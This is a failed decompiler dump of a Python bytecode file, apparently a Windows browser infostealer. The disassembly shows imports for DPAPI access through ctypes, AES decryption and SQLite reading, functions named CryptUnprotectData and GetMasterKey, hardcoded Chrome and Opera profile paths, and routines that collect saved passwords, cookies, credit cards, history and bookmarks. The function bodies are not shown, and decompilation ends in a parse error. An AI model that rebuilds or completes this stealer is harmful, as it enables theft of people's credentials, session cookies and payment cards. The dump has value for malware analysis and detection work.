
# file test/101620.pyc
# --- This code section failed: ---

 L.   3         0  LOAD_CONST               0
                2  LOAD_CONST               None
                4  IMPORT_NAME              os
                6  STORE_NAME               os

 L.   4         8  LOAD_CONST               0
               10  LOAD_CONST               None
               12  IMPORT_NAME              shutil
               14  STORE_NAME               shutil

 L.   5        16  LOAD_CONST               0
               18  LOAD_CONST               None
               20  IMPORT_NAME              random
               22  STORE_NAME               random

 L.   6        24  LOAD_CONST               0
               26  LOAD_CONST               None
               28  IMPORT_NAME              ctypes
               30  STORE_NAME               ctypes

 L.   7        32  LOAD_CONST               0
               34  LOAD_CONST               None
               36  IMPORT_NAME              subprocess
               38  STORE_NAME               subprocess

 L.   8        40  LOAD_CONST               0
               42  LOAD_CONST               ('wintypes',)
               44  IMPORT_NAME              ctypes
               46  IMPORT_FROM              wintypes
               48  STORE_NAME               wintypes
               50  POP_TOP          

 L.   9        52  LOAD_CONST               0
               54  LOAD_CONST               ('b64decode',)
               56  IMPORT_NAME              base64
               58  IMPORT_FROM              b64decode
               60  STORE_NAME               b64decode
               62  POP_TOP          

 L.  10        64  LOAD_CONST               0
               66  LOAD_CONST               ('datetime',)
               68  IMPORT_NAME              datetime
               70  IMPORT_FROM              datetime
               72  STORE_NAME               datetime
               74  POP_TOP          

 L.  11        76  LOAD_CONST               0
               78  LOAD_CONST               ('ascii_lowercase',)
               80  IMPORT_NAME              string
               82  IMPORT_FROM              ascii_lowercase
               84  STORE_NAME               ascii_lowercase
               86  POP_TOP          

 L.  12        88  LOAD_CONST               0
               90  LOAD_CONST               ('connect',)
               92  IMPORT_NAME              sqlite3
               94  IMPORT_FROM              connect
               96  STORE_NAME               sql_connect
               98  POP_TOP          

 L.  13       100  LOAD_CONST               0
              102  LOAD_CONST               ('loads', 'load')
              104  IMPORT_NAME              json
              106  IMPORT_FROM              loads
              108  STORE_NAME               json_loads
              110  IMPORT_FROM              load
              112  STORE_NAME               load
              114  POP_TOP          

 L.  14       116  SETUP_FINALLY       134  'to 134'

 L.  15       118  LOAD_CONST               0
              120  LOAD_CONST               ('AES',)
              122  IMPORT_NAME_ATTR         Crypto.Cipher
              124  IMPORT_FROM              AES
              126  STORE_NAME               AES
              128  POP_TOP          
              130  POP_BLOCK        
              132  JUMP_FORWARD        160  'to 160'
            134_0  COME_FROM_FINALLY   116  '116'

 L.  16       134  DUP_TOP          
              136  LOAD_NAME                ImportError
              138  <121>               158  ''
              140  POP_TOP          
              142  POP_TOP          
              144  POP_TOP          

 L.  17       146  LOAD_NAME                SystemExit
              148  LOAD_STR                 'Please run › pip install pycryptodome'
              150  CALL_FUNCTION_1       1  ''
              152  RAISE_VARARGS_1       1  'exception instance'
              154  POP_EXCEPT       
              156  JUMP_FORWARD        160  'to 160'
              158  <48>             
            160_0  COME_FROM           156  '156'
            160_1  COME_FROM           132  '132'

 L.  22       160  LOAD_BUILD_CLASS 
              162  LOAD_CODE                <code_object DATA_BLOB>
              164  LOAD_STR                 'DATA_BLOB'
              166  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              168  LOAD_STR                 'DATA_BLOB'
              170  LOAD_NAME                ctypes
              172  LOAD_ATTR                Structure
              174  CALL_FUNCTION_3       3  ''
              176  STORE_NAME               DATA_BLOB

 L.  31       178  LOAD_CODE                <code_object GetData>
              180  LOAD_STR                 'GetData'
              182  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              184  STORE_NAME               GetData

 L.  42       186  LOAD_CONST               (b'',)
              188  LOAD_CODE                <code_object CryptUnprotectData>
              190  LOAD_STR                 'CryptUnprotectData'
              192  MAKE_FUNCTION_1          'default'
              194  STORE_NAME               CryptUnprotectData

 L.  56       196  LOAD_NAME                os
              198  LOAD_ATTR                environ
              200  LOAD_STR                 'LocalAppData'
              202  BINARY_SUBSCR    
              204  LOAD_STR                 '\\'
              206  BINARY_ADD       
              208  STORE_NAME               LocalAppData

 L.  57       210  LOAD_NAME                os
              212  LOAD_ATTR                environ
              214  LOAD_STR                 'AppData'
              216  BINARY_SUBSCR    
              218  LOAD_STR                 '\\'
              220  BINARY_ADD       
              222  STORE_NAME               AppData

 L.  58       224  LOAD_CONST               116444736000000000
              226  STORE_NAME               FileName

 L.  59       228  LOAD_CONST               10000000
              230  STORE_NAME               NanoSeconds

 L.  64       232  LOAD_NAME                subprocess
              234  LOAD_ATTR                Popen
              236  LOAD_STR                 '@chcp 65001 1>nul'
              238  LOAD_CONST               True
              240  LOAD_CONST               ('shell',)
              242  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              244  POP_TOP          

 L.  69       246  LOAD_CODE                <code_object GetBrowsers>
              248  LOAD_STR                 'GetBrowsers'
              250  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              252  STORE_NAME               GetBrowsers

 L.  81       254  LOAD_CODE                <code_object DecryptPayload>
              256  LOAD_STR                 'DecryptPayload'
              258  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              260  STORE_NAME               DecryptPayload

 L.  87       262  LOAD_CODE                <code_object GenerateCipher>
              264  LOAD_STR                 'GenerateCipher'
              266  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              268  STORE_NAME               GenerateCipher

 L.  93       270  LOAD_CODE                <code_object GetMasterKey>
              272  LOAD_STR                 'GetMasterKey'
              274  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              276  STORE_NAME               GetMasterKey

 L. 118       278  LOAD_CONST               (None,)
              280  LOAD_CODE                <code_object DecryptValue>
              282  LOAD_STR                 'DecryptValue'
              284  MAKE_FUNCTION_1          'default'
              286  STORE_NAME               DecryptValue

 L. 136       288  LOAD_CONST               ('',)
              290  LOAD_CODE                <code_object FetchDataBase>
              292  LOAD_STR                 'FetchDataBase'
              294  MAKE_FUNCTION_1          'default'
              296  STORE_NAME               FetchDataBase

 L. 159       298  LOAD_CODE                <code_object ConvertDate>
              300  LOAD_STR                 'ConvertDate'
              302  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              304  STORE_NAME               ConvertDate

 L. 167       306  LOAD_NAME                LocalAppData
              308  LOAD_STR                 'Google\\Chrome\\User Data\\Default'
              310  BINARY_ADD       

 L. 168       312  LOAD_NAME                AppData
              314  LOAD_STR                 'Opera Software\\Opera Stable'
              316  BINARY_ADD       

 L. 166       318  BUILD_TUPLE_2         2 
              320  STORE_NAME               BrowsersPath

 L. 174       322  LOAD_CODE                <code_object GetCreditCards>
              324  LOAD_STR                 'GetCreditCards'
              326  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              328  STORE_NAME               GetCreditCards

 L. 199       330  LOAD_CODE                <code_object GetFormattedCreditCards>
              332  LOAD_STR                 'GetFormattedCreditCards'
              334  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              336  STORE_NAME               GetFormattedCreditCards

 L. 211       338  LOAD_CODE                <code_object GetBookmarks>
              340  LOAD_STR                 'GetBookmarks'
              342  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              344  STORE_NAME               GetBookmarks

 L. 238       346  LOAD_CODE                <code_object GetFormattedBookmarks>
              348  LOAD_STR                 'GetFormattedBookmarks'
              350  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              352  STORE_NAME               GetFormattedBookmarks

 L. 251       354  LOAD_CODE                <code_object GetPasswords>
              356  LOAD_STR                 'GetPasswords'
              358  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              360  STORE_NAME               GetPasswords

 L. 272       362  LOAD_CODE                <code_object GetFormattedPasswords>
              364  LOAD_STR                 'GetFormattedPasswords'
              366  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              368  STORE_NAME               GetFormattedPasswords

 L. 285       370  LOAD_CODE                <code_object GetCookies>
              372  LOAD_STR                 'GetCookies'
              374  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              376  STORE_NAME               GetCookies

 L. 309       378  LOAD_CODE                <code_object GetFormattedCookies>
              380  LOAD_STR                 'GetFormattedCookies'
              382  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              384  STORE_NAME               GetFormattedCookies

 L. 322       386  LOAD_CODE                <code_object GetHistory>
              388  LOAD_STR                 'GetHistory'
              390  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              392  STORE_NAME               GetHistory

 L. 343       394  LOAD_CODE                <code_object GetFormattedHistory>
              396  LOAD_STR                 'GetFormattedHistory'
              398  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              400  STORE_NAME               GetFormattedHistory

Parse error at or near `<121>' instruction at offset 138

Instruction context:
   
 L.  16       134  DUP_TOP          
                 136  LOAD_NAME                ImportError
->               138  <121>               158  ''
                 140  POP_TOP          
                 142  POP_TOP          
                 144  POP_TOP          

test/101620.pyc -- 
# decompile failed
